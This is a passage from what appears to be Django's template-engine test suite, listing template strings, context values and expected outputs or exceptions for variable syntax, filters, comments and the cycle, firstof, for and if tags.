if exc_type != result:
tb = '\n'.join(traceback.format_exception(exc_type, exc_value, exc_tb))
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Got %s, exception: %s\n%s" % (is_cached, invalid_str, template_debug, name, exc_type, exc_value, tb))
continue
if output != result:
failures.append("Template test (Cached='%s', TEMPLATE_STRING_IF_INVALID='%s', TEMPLATE_DEBUG=%s): %s -- FAILED. Expected %r, got %r" % (is_cached, invalid_str, template_debug, name, result, output))
cache_loader.reset()
if 'LANGUAGE_CODE' in vals[1]:
deactivate()
if template_base.invalid_var_format_string:
expected_invalid_str = 'INVALID'
template_base.invalid_var_format_string = False
restore_template_loaders()
deactivate()
settings.TEMPLATE_DEBUG = old_td
settings.TEMPLATE_STRING_IF_INVALID = old_invalid
settings.ALLOWED_INCLUDE_ROOTS = old_allowed_include_roots
self.assertEqual(failures, [], "Tests failed:\n%s\n%s" %
('-'*70, ("\n%s\n" % ('-'*70)).join(failures)))
def render(self, test_template, vals):
context = template.Context(vals[1])
before_stack_size = len(context.dicts)
output = test_template.render(context)
if len(context.dicts) != before_stack_size:
raise ContextStackException
return output
def get_template_tests(self):
# SYNTAX --
# 'template_name': ('template contents', 'context dict', 'expected string output' or Exception class)
basedir = os.path.dirname(os.path.abspath(__file__))
tests = {
### BASIC SYNTAX ################################################
# Plain text should go through the template parser untouched
'basic-syntax01': ("something cool", {}, "something cool"),
# Variables should be replaced with their value in the current
# context
'basic-syntax02': ("{{ headline }}", {'headline':'Success'}, "Success"),
# More than one replacement variable is allowed in a template
'basic-syntax03': ("{{ first }} --- {{ second }}", {"first" : 1, "second" : 2}, "1 --- 2"),
# Fail silently when a variable is not found in the current context
'basic-syntax04': ("as{{ missing }}df", {}, ("asdf","asINVALIDdf")),
# A variable may not contain more than one word
'basic-syntax06': ("{{ multi word variable }}", {}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError for empty variable tags
'basic-syntax07': ("{{ }}", {}, template.TemplateSyntaxError),
'basic-syntax08': ("{{ }}", {}, template.TemplateSyntaxError),
# Attribute syntax allows a template to call an object's attribute
'basic-syntax09': ("{{ var.method }}", {"var": SomeClass()}, "SomeClass.method"),
# Multiple levels of attribute access are allowed
'basic-syntax10': ("{{ var.otherclass.method }}", {"var": SomeClass()}, "OtherClass.method"),
# Fail silently when a variable's attribute isn't found
'basic-syntax11': ("{{ var.blech }}", {"var": SomeClass()}, ("","INVALID")),
# Raise TemplateSyntaxError when trying to access a variable beginning with an underscore
'basic-syntax12': ("{{ var.__dict__ }}", {"var": SomeClass()}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError when trying to access a variable containing an illegal character
'basic-syntax13': ("{{ va>r }}", {}, template.TemplateSyntaxError),
'basic-syntax14': ("{{ (var.r) }}", {}, template.TemplateSyntaxError),
'basic-syntax15': ("{{ sp%am }}", {}, template.TemplateSyntaxError),
'basic-syntax16': ("{{ eggs! }}", {}, template.TemplateSyntaxError),
'basic-syntax17': ("{{ moo? }}", {}, template.TemplateSyntaxError),
# Attribute syntax allows a template to call a dictionary key's value
'basic-syntax18': ("{{ foo.bar }}", {"foo" : {"bar" : "baz"}}, "baz"),
# Fail silently when a variable's dictionary key isn't found
'basic-syntax19': ("{{ foo.spam }}", {"foo" : {"bar" : "baz"}}, ("","INVALID")),
# Fail silently when accessing a non-simple method
'basic-syntax20': ("{{ var.method2 }}", {"var": SomeClass()}, ("","INVALID")),
# Don't get confused when parsing something that is almost, but not
# quite, a template tag.
'basic-syntax21': ("a {{ moo %} b", {}, "a {{ moo %} b"),
'basic-syntax22': ("{{ moo #}", {}, "{{ moo #}"),
# Will try to treat "moo #} {{ cow" as the variable. Not ideal, but
# costly to work around, so this triggers an error.
'basic-syntax23': ("{{ moo #} {{ cow }}", {"cow": "cow"}, template.TemplateSyntaxError),
# Embedded newlines make it not-a-tag.
'basic-syntax24': ("{{ moo\n }}", {}, "{{ moo\n }}"),
# Literal strings are permitted inside variables, mostly for i18n
# purposes.
'basic-syntax25': ('{{ "fred" }}', {}, "fred"),
'basic-syntax26': (r'{{ "\"fred\"" }}', {}, "\"fred\""),
'basic-syntax27': (r'{{ _("\"fred\"") }}', {}, "\"fred\""),
# regression test for ticket #12554
            # make sure a silent_variable_failure Exception is suppressed
# on dictionary and attribute lookup
'basic-syntax28': ("{{ a.b }}", {'a': SilentGetItemClass()}, ('', 'INVALID')),
'basic-syntax29': ("{{ a.b }}", {'a': SilentAttrClass()}, ('', 'INVALID')),
# Something that starts like a number but has an extra lookup works as a lookup.
'basic-syntax30': ("{{ 1.2.3 }}", {"1": {"2": {"3": "d"}}}, "d"),
'basic-syntax31': ("{{ 1.2.3 }}", {"1": {"2": ("a", "b", "c", "d")}}, "d"),
'basic-syntax32': ("{{ 1.2.3 }}", {"1": (("x", "x", "x", "x"), ("y", "y", "y", "y"), ("a", "b", "c", "d"))}, "d"),
'basic-syntax33': ("{{ 1.2.3 }}", {"1": ("xxxx", "yyyy", "abcd")}, "d"),
'basic-syntax34': ("{{ 1.2.3 }}", {"1": ({"x": "x"}, {"y": "y"}, {"z": "z", "3": "d"})}, "d"),
# Numbers are numbers even if their digits are in the context.
'basic-syntax35': ("{{ 1 }}", {"1": "abc"}, "1"),
'basic-syntax36': ("{{ 1.2 }}", {"1": "abc"}, "1.2"),
# Call methods in the top level of the context
'basic-syntax37': ('{{ callable }}', {"callable": lambda: "foo bar"}, "foo bar"),
# Call methods returned from dictionary lookups
'basic-syntax38': ('{{ var.callable }}', {"var": {"callable": lambda: "foo bar"}}, "foo bar"),
'builtins01': ('{{ True }}', {}, "True"),
'builtins02': ('{{ False }}', {}, "False"),
'builtins03': ('{{ None }}', {}, "None"),
# List-index syntax allows a template to access a certain item of a subscriptable object.
'list-index01': ("{{ var.1 }}", {"var": ["first item", "second item"]}, "second item"),
# Fail silently when the list index is out of range.
'list-index02': ("{{ var.5 }}", {"var": ["first item", "second item"]}, ("", "INVALID")),
# Fail silently when the variable is not a subscriptable object.
'list-index03': ("{{ var.1 }}", {"var": None}, ("", "INVALID")),
# Fail silently when variable is a dict without the specified key.
'list-index04': ("{{ var.1 }}", {"var": {}}, ("", "INVALID")),
# Dictionary lookup wins out when dict's key is a string.
'list-index05': ("{{ var.1 }}", {"var": {'1': "hello"}}, "hello"),
# But list-index lookup wins out when dict's key is an int, which
# behind the scenes is really a dictionary lookup (for a dict)
# after converting the key to an int.
'list-index06': ("{{ var.1 }}", {"var": {1: "hello"}}, "hello"),
# Dictionary lookup wins out when there is a string and int version of the key.
'list-index07': ("{{ var.1 }}", {"var": {'1': "hello", 1: "world"}}, "hello"),
# Basic filter usage
'filter-syntax01': ("{{ var|upper }}", {"var": "Django is the greatest!"}, "DJANGO IS THE GREATEST!"),
# Chained filters
'filter-syntax02': ("{{ var|upper|lower }}", {"var": "Django is the greatest!"}, "django is the greatest!"),
# Allow spaces before the filter pipe
'filter-syntax03': ("{{ var |upper }}", {"var": "Django is the greatest!"}, "DJANGO IS THE GREATEST!"),
# Allow spaces after the filter pipe
'filter-syntax04': ("{{ var| upper }}", {"var": "Django is the greatest!"}, "DJANGO IS THE GREATEST!"),
# Raise TemplateSyntaxError for a nonexistent filter
'filter-syntax05': ("{{ var|does_not_exist }}", {}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError when trying to access a filter containing an illegal character
'filter-syntax06': ("{{ var|fil(ter) }}", {}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError for invalid block tags
'filter-syntax07': ("{% nothing_to_see_here %}", {}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError for empty block tags
'filter-syntax08': ("{% %}", {}, template.TemplateSyntaxError),
# Chained filters, with an argument to the first one
'filter-syntax09': ('{{ var|removetags:"b i"|upper|lower }}', {"var": "<b><i>Yes</i></b>"}, "yes"),
            # Literal string as argument is always "safe" from auto-escaping.
'filter-syntax10': (r'{{ var|default_if_none:" endquote\" hah" }}',
{"var": None}, ' endquote" hah'),
# Variable as argument
'filter-syntax11': (r'{{ var|default_if_none:var2 }}', {"var": None, "var2": "happy"}, 'happy'),
# Default argument testing
'filter-syntax12': (r'{{ var|yesno:"yup,nup,mup" }} {{ var|yesno }}', {"var": True}, 'yup yes'),
# Fail silently for methods that raise an exception with a
# "silent_variable_failure" attribute
'filter-syntax13': (r'1{{ var.method3 }}2', {"var": SomeClass()}, ("12", "1INVALID2")),
            # In methods that raise an exception without a
            # "silent_variable_failure" attribute set to True, the exception propagates
'filter-syntax14': (r'1{{ var.method4 }}2', {"var": SomeClass()}, (SomeOtherException, SomeOtherException)),
# Escaped backslash in argument
'filter-syntax15': (r'{{ var|default_if_none:"foo\bar" }}', {"var": None}, r'foo\bar'),
# Escaped backslash using known escape char
'filter-syntax16': (r'{{ var|default_if_none:"foo\now" }}', {"var": None}, r'foo\now'),
# Empty strings can be passed as arguments to filters
'filter-syntax17': (r'{{ var|join:"" }}', {'var': ['a', 'b', 'c']}, 'abc'),
            # Make sure that bytestrings (here, UTF-8 encoded) are converted to
            # unicode strings in the final output.
'filter-syntax18': (r'{{ var }}', {'var': UTF8Class()}, '\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'),
# Numbers as filter arguments should work
'filter-syntax19': ('{{ var|truncatewords:1 }}', {"var": "hello world"}, "hello ..."),
            # Filters should accept empty string constants
'filter-syntax20': ('{{ ""|default_if_none:"was none" }}', {}, ""),
# Fail silently for non-callable attribute and dict lookups which
# raise an exception with a "silent_variable_failure" attribute
'filter-syntax21': (r'1{{ var.silent_fail_key }}2', {"var": SomeClass()}, ("12", "1INVALID2")),
'filter-syntax22': (r'1{{ var.silent_fail_attribute }}2', {"var": SomeClass()}, ("12", "1INVALID2")),
# In attribute and dict lookups that raise an unexpected exception
# without a "silent_variable_attribute" set to True, the exception
# propagates
'filter-syntax23': (r'1{{ var.noisy_fail_key }}2', {"var": SomeClass()}, (SomeOtherException, SomeOtherException)),
'filter-syntax24': (r'1{{ var.noisy_fail_attribute }}2', {"var": SomeClass()}, (SomeOtherException, SomeOtherException)),
### COMMENT SYNTAX ########################################################
'comment-syntax01': ("{# this is hidden #}hello", {}, "hello"),
'comment-syntax02': ("{# this is hidden #}hello{# foo #}", {}, "hello"),
# Comments can contain invalid stuff.
'comment-syntax03': ("foo{# {% if %} #}", {}, "foo"),
'comment-syntax04': ("foo{# {% endblock %} #}", {}, "foo"),
'comment-syntax05': ("foo{# {% somerandomtag %} #}", {}, "foo"),
'comment-syntax06': ("foo{# {% #}", {}, "foo"),
'comment-syntax07': ("foo{# %} #}", {}, "foo"),
'comment-syntax08': ("foo{# %} #}bar", {}, "foobar"),
'comment-syntax09': ("foo{# {{ #}", {}, "foo"),
'comment-syntax10': ("foo{# }} #}", {}, "foo"),
'comment-syntax11': ("foo{# { #}", {}, "foo"),
'comment-syntax12': ("foo{# } #}", {}, "foo"),
### COMMENT TAG ###########################################################
'comment-tag01': ("{% comment %}this is hidden{% endcomment %}hello", {}, "hello"),
'comment-tag02': ("{% comment %}this is hidden{% endcomment %}hello{% comment %}foo{% endcomment %}", {}, "hello"),
# Comment tag can contain invalid stuff.
'comment-tag03': ("foo{% comment %} {% if %} {% endcomment %}", {}, "foo"),
'comment-tag04': ("foo{% comment %} {% endblock %} {% endcomment %}", {}, "foo"),
'comment-tag05': ("foo{% comment %} {% somerandomtag %} {% endcomment %}", {}, "foo"),
### CYCLE TAG #############################################################
'cycle01': ('{% cycle a %}', {}, template.TemplateSyntaxError),
'cycle02': ('{% cycle a,b,c as abc %}{% cycle abc %}', {}, 'ab'),
'cycle03': ('{% cycle a,b,c as abc %}{% cycle abc %}{% cycle abc %}', {}, 'abc'),
'cycle04': ('{% cycle a,b,c as abc %}{% cycle abc %}{% cycle abc %}{% cycle abc %}', {}, 'abca'),
'cycle05': ('{% cycle %}', {}, template.TemplateSyntaxError),
'cycle06': ('{% cycle a %}', {}, template.TemplateSyntaxError),
'cycle07': ('{% cycle a,b,c as foo %}{% cycle bar %}', {}, template.TemplateSyntaxError),
'cycle08': ('{% cycle a,b,c as foo %}{% cycle foo %}{{ foo }}{{ foo }}{% cycle foo %}{{ foo }}', {}, 'abbbcc'),
'cycle09': ("{% for i in test %}{% cycle a,b %}{{ i }},{% endfor %}", {'test': range(5)}, 'a0,b1,a2,b3,a4,'),
'cycle10': ("{% cycle 'a' 'b' 'c' as abc %}{% cycle abc %}", {}, 'ab'),
'cycle11': ("{% cycle 'a' 'b' 'c' as abc %}{% cycle abc %}{% cycle abc %}", {}, 'abc'),
'cycle12': ("{% cycle 'a' 'b' 'c' as abc %}{% cycle abc %}{% cycle abc %}{% cycle abc %}", {}, 'abca'),
'cycle13': ("{% for i in test %}{% cycle 'a' 'b' %}{{ i }},{% endfor %}", {'test': range(5)}, 'a0,b1,a2,b3,a4,'),
'cycle14': ("{% cycle one two as foo %}{% cycle foo %}", {'one': '1','two': '2'}, '12'),
'cycle15': ("{% for i in test %}{% cycle aye bee %}{{ i }},{% endfor %}", {'test': range(5), 'aye': 'a', 'bee': 'b'}, 'a0,b1,a2,b3,a4,'),
'cycle16': ("{% cycle one|lower two as foo %}{% cycle foo %}", {'one': 'A','two': '2'}, 'a2'),
'cycle17': ("{% cycle 'a' 'b' 'c' as abc silent %}{% cycle abc %}{% cycle abc %}{% cycle abc %}{% cycle abc %}", {}, ""),
'cycle18': ("{% cycle 'a' 'b' 'c' as foo invalid_flag %}", {}, template.TemplateSyntaxError),
'cycle19': ("{% cycle 'a' 'b' as silent %}{% cycle silent %}", {}, "ab"),
'cycle20': ("{% cycle one two as foo %} & {% cycle foo %}", {'one' : 'A & B', 'two' : 'C & D'}, "A & B & C & D"),
'cycle21': ("{% filter force_escape %}{% cycle one two as foo %} & {% cycle foo %}{% endfilter %}", {'one' : 'A & B', 'two' : 'C & D'}, "A & B & C & D"),
'cycle22': ("{% for x in values %}{% cycle 'a' 'b' 'c' as abc silent %}{{ x }}{% endfor %}", {'values': [1,2,3,4]}, "1234"),
'cycle23': ("{% for x in values %}{% cycle 'a' 'b' 'c' as abc silent %}{{ abc }}{{ x }}{% endfor %}", {'values': [1,2,3,4]}, "a1b2c3a4"),
'included-cycle': ('{{ abc }}', {'abc': 'xxx'}, 'xxx'),
'cycle24': ("{% for x in values %}{% cycle 'a' 'b' 'c' as abc silent %}{% include 'included-cycle' %}{% endfor %}", {'values': [1,2,3,4]}, "abca"),
### EXCEPTIONS ############################################################
# Raise exception for invalid template name
'exception01': ("{% extends 'nonexistent' %}", {}, (template.TemplateDoesNotExist, template.TemplateDoesNotExist)),
# Raise exception for invalid template name (in variable)
'exception02': ("{% extends nonexistent %}", {}, (template.TemplateSyntaxError, template.TemplateDoesNotExist)),
# Raise exception for extra {% extends %} tags
'exception03': ("{% extends 'inheritance01' %}{% block first %}2{% endblock %}{% extends 'inheritance16' %}", {}, template.TemplateSyntaxError),
# Raise exception for custom tags used in child with {% load %} tag in parent, not in child
'exception04': ("{% extends 'inheritance17' %}{% block first %}{% echo 400 %}5678{% endblock %}", {}, template.TemplateSyntaxError),
### FILTER TAG ############################################################
'filter01': ('{% filter upper %}{% endfilter %}', {}, ''),
'filter02': ('{% filter upper %}django{% endfilter %}', {}, 'DJANGO'),
'filter03': ('{% filter upper|lower %}django{% endfilter %}', {}, 'django'),
'filter04': ('{% filter cut:remove %}djangospam{% endfilter %}', {'remove': 'spam'}, 'django'),
### FIRSTOF TAG ###########################################################
'firstof01': ('{% firstof a b c %}', {'a':0,'b':0,'c':0}, ''),
'firstof02': ('{% firstof a b c %}', {'a':1,'b':0,'c':0}, '1'),
'firstof03': ('{% firstof a b c %}', {'a':0,'b':2,'c':0}, '2'),
'firstof04': ('{% firstof a b c %}', {'a':0,'b':0,'c':3}, '3'),
'firstof05': ('{% firstof a b c %}', {'a':1,'b':2,'c':3}, '1'),
'firstof06': ('{% firstof a b c %}', {'b':0,'c':3}, '3'),
'firstof07': ('{% firstof a b "c" %}', {'a':0}, 'c'),
'firstof08': ('{% firstof a b "c and d" %}', {'a':0,'b':0}, 'c and d'),
'firstof09': ('{% firstof %}', {}, template.TemplateSyntaxError),
'firstof10': ('{% firstof a %}', {'a': '<'}, '<'), # Variables are NOT auto-escaped.
### FOR TAG ###############################################################
'for-tag01': ("{% for val in values %}{{ val }}{% endfor %}", {"values": [1, 2, 3]}, "123"),
'for-tag02': ("{% for val in values reversed %}{{ val }}{% endfor %}", {"values": [1, 2, 3]}, "321"),
'for-tag-vars01': ("{% for val in values %}{{ forloop.counter }}{% endfor %}", {"values": [6, 6, 6]}, "123"),
'for-tag-vars02': ("{% for val in values %}{{ forloop.counter0 }}{% endfor %}", {"values": [6, 6, 6]}, "012"),
'for-tag-vars03': ("{% for val in values %}{{ forloop.revcounter }}{% endfor %}", {"values": [6, 6, 6]}, "321"),
'for-tag-vars04': ("{% for val in values %}{{ forloop.revcounter0 }}{% endfor %}", {"values": [6, 6, 6]}, "210"),
'for-tag-vars05': ("{% for val in values %}{% if forloop.first %}f{% else %}x{% endif %}{% endfor %}", {"values": [6, 6, 6]}, "fxx"),
'for-tag-vars06': ("{% for val in values %}{% if forloop.last %}l{% else %}x{% endif %}{% endfor %}", {"values": [6, 6, 6]}, "xxl"),
'for-tag-unpack01': ("{% for key,value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
'for-tag-unpack03': ("{% for key, value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
'for-tag-unpack04': ("{% for key , value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
'for-tag-unpack05': ("{% for key ,value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
'for-tag-unpack06': ("{% for key value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, template.TemplateSyntaxError),
'for-tag-unpack07': ("{% for key,,value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, template.TemplateSyntaxError),
'for-tag-unpack08': ("{% for key,value, in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, template.TemplateSyntaxError),
# Ensure that a single loopvar doesn't truncate the list in val.
'for-tag-unpack09': ("{% for val in items %}{{ val.0 }}:{{ val.1 }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
            # Otherwise, silently truncate if the length of loopvars differs from the length of each set of items.
'for-tag-unpack10': ("{% for x,y in items %}{{ x }}:{{ y }}/{% endfor %}", {"items": (('one', 1, 'carrot'), ('two', 2, 'orange'))}, "one:1/two:2/"),
'for-tag-unpack11': ("{% for x,y,z in items %}{{ x }}:{{ y }},{{ z }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, ("one:1,/two:2,/", "one:1,INVALID/two:2,INVALID/")),
'for-tag-unpack12': ("{% for x,y,z in items %}{{ x }}:{{ y }},{{ z }}/{% endfor %}", {"items": (('one', 1, 'carrot'), ('two', 2))}, ("one:1,carrot/two:2,/", "one:1,carrot/two:2,INVALID/")),
'for-tag-unpack13': ("{% for x,y,z in items %}{{ x }}:{{ y }},{{ z }}/{% endfor %}", {"items": (('one', 1, 'carrot'), ('two', 2, 'cheese'))}, ("one:1,carrot/two:2,cheese/", "one:1,carrot/two:2,cheese/")),
'for-tag-unpack14': ("{% for x,y in items %}{{ x }}:{{ y }}/{% endfor %}", {"items": (1, 2)}, (":/:/", "INVALID:INVALID/INVALID:INVALID/")),
'for-tag-empty01': ("{% for val in values %}{{ val }}{% empty %}empty text{% endfor %}", {"values": [1, 2, 3]}, "123"),
'for-tag-empty02': ("{% for val in values %}{{ val }}{% empty %}values array empty{% endfor %}", {"values": []}, "values array empty"),
'for-tag-empty03': ("{% for val in values %}{{ val }}{% empty %}values array not found{% endfor %}", {}, "values array not found"),
### IF TAG ################################################################
'if-tag01': ("{% if foo %}yes{% else %}no{% endif %}", {"foo": True}, "yes"),
'if-tag02': ("{% if foo %}yes{% else %}no{% endif %}", {"foo": False}, "no"),
'if-tag03': ("{% if foo %}yes{% else %}no{% endif %}", {}, "no"),
'if-tag04': ("{% if foo %}foo{% elif bar %}bar{% endif %}", {'foo': True}, "foo"),
'if-tag05': ("{% if foo %}foo{% elif bar %}bar{% endif %}", {'bar': True}, "bar"),
'if-tag06': ("{% if foo %}foo{% elif bar %}bar{% endif %}", {}, ""),
'if-tag07': ("{% if foo %}foo{% elif bar %}bar{% else %}nothing{% endif %}", {'foo': True}, "foo"),
'if-tag08': ("{% if foo %}foo{% elif bar %}bar{% else %}nothing{% endif %}", {'bar': True}, "bar"),
'if-tag09': ("{% if foo %}foo{% elif bar %}bar{% else %}nothing{% endif %}", {}, "nothing"),
'if-tag10': ("{% if foo %}foo{% elif bar %}bar{% elif baz %}baz{% else %}nothing{% endif %}", {'foo': True}, "foo"),
'if-tag11': ("{% if foo %}foo{% elif bar %}bar{% elif baz %}baz{% else %}nothing{% endif %}", {'bar': True}, "bar"),
'if-tag12': ("{% if foo %}foo{% elif bar %}bar{% elif baz %}baz{% else %}nothing{% endif %}", {'baz': True}, "baz"),
'if-tag13': ("{% if foo %}foo{% elif bar %}bar{% elif baz %}baz{% else %}nothing{% endif %}", {}, "nothing"),
# Filters
'if-tag-filter01': ("{% if foo|length == 5 %}yes{% else %}no{% endif %}", {'foo': 'abcde'}, "yes"),
'if-tag-filter02': ("{% if foo|upper == 'ABC' %}yes{% else %}no{% endif %}", {}, "no"),
# Equality
'if-tag-eq01': ("{% if foo == bar %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-eq02': ("{% if foo == bar %}yes{% else %}no{% endif %}", {'foo': 1}, "no"),
'if-tag-eq03': ("{% if foo == bar %}yes{% else %}no{% endif %}", {'foo': 1, 'bar': 1}, "yes"),
'if-tag-eq04': ("{% if foo == bar %}yes{% else %}no{% endif %}", {'foo': 1, 'bar': 2}, "no"),
'if-tag-eq05': ("{% if foo == '' %}yes{% else %}no{% endif %}", {}, "no"),
# Comparison
'if-tag-gt-01': ("{% if 2 > 1 %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-gt-02': ("{% if 1 > 1 %}yes{% else %}no{% endif %}", {}, "no"),
'if-tag-gte-01': ("{% if 1 >= 1 %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-gte-02': ("{% if 1 >= 2 %}yes{% else %}no{% endif %}", {}, "no"),
'if-tag-lt-01': ("{% if 1 < 2 %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-lt-02': ("{% if 1 < 1 %}yes{% else %}no{% endif %}", {}, "no"),
'if-tag-lte-01': ("{% if 1 <= 1 %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-lte-02': ("{% if 2 <= 1 %}yes{% else %}no{% endif %}", {}, "no"),
# Contains
'if-tag-in-01': ("{% if 1 in x %}yes{% else %}no{% endif %}", {'x':[1]}, "yes"),
'if-tag-in-02': ("{% if 2 in x %}yes{% else %}no{% endif %}", {'x':[1]}, "no"),
'if-tag-not-in-01': ("{% if 1 not in x %}yes{% else %}no{% endif %}", {'x':[1]}, "no"),
'if-tag-not-in-02': ("{% if 2 not in x %}yes{% else %}no{% endif %}", {'x':[1]}, "yes"),
# AND
'if-tag-and01': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'yes'),
'if-tag-and02': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'no'),
'if-tag-and03': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'no'),
'if-tag-and04': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'no'),
'if-tag-and05': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': False}, 'no'),
'if-tag-and06': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'bar': False}, 'no'),
'if-tag-and07': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': True}, 'no'),
'if-tag-and08': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'bar': True}, 'no'),
# OR
'if-tag-or01': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'yes'),
'if-tag-or02': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'yes'),
'if-tag-or03': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'yes'),
'if-tag-or04': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'no'),
'if-tag-or05': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': False}, 'no'),
'if-tag-or06': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'bar': False}, 'no'),
'if-tag-or07': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': True}, 'yes'),
'if-tag-or08': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'bar': True}, 'yes'),
# multiple ORs
'if-tag-or09': ("{% if foo or bar or baz %}yes{% else %}no{% endif %}", {'baz': True}, 'yes'),
# NOT
'if-tag-not01': ("{% if not foo %}no{% else %}yes{% endif %}", {'foo': True}, 'yes'),
'if-tag-not02': ("{% if not not foo %}no{% else %}yes{% endif %}", {'foo': True}, 'no'),
# not03 to not05 removed, now TemplateSyntaxErrors
'if-tag-not06': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {}, 'no'),
'if-tag-not07': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'no'),
'if-tag-not08': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'yes'),
'if-tag-not09': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'no'),
'if-tag-not10': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'no'),
'if-tag-not11': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {}, 'no'),
'if-tag-not12': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'no'),
'if-tag-not13': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'no'),
'if-tag-not14': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'yes'),
'if-tag-not15': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'no'),
'if-tag-not16': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {}, 'yes'),
'if-tag-not17': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'yes'),
'if-tag-not18': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'yes'),
'if-tag-not19': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'no'),
'if-tag-not20': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'yes'),
'if-tag-not21': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {}, 'yes'),
'if-tag-not22': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'yes'),
'if-tag-not23': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'no'),
'if-tag-not24': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'yes'),
'if-tag-not25': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'yes'),
'if-tag-not26': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {}, 'yes'),
'if-tag-not27': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'no'),
'if-tag-not28': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'no'),
'if-tag-not29': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'no'),
'if-tag-not30': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'yes'),
'if-tag-not31': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {}, 'yes'),
'if-tag-not32': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'no'),
'if-tag-not33': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'yes'),
'if-tag-not34': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'yes'),
'if-tag-not35': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'yes'),
# Various syntax errors
'if-tag-error01': ("{% if %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error02': ("{% if foo and %}yes{% else %}no{% endif %}", {'foo': True}, template.TemplateSyntaxError),
'if-tag-error03': ("{% if foo or %}yes{% else %}no{% endif %}", {'foo': True}, template.TemplateSyntaxError),
'if-tag-error04': ("{% if not foo and %}yes{% else %}no{% endif %}", {'foo': True}, template.TemplateSyntaxError),
'if-tag-error05': ("{% if not foo or %}yes{% else %}no{% endif %}", {'foo': True}, template.TemplateSyntaxError),
'if-tag-error06': ("{% if abc def %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error07': ("{% if not %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error08': ("{% if and %}yes{% endif %}", {}, template.TemplateSyntaxError),
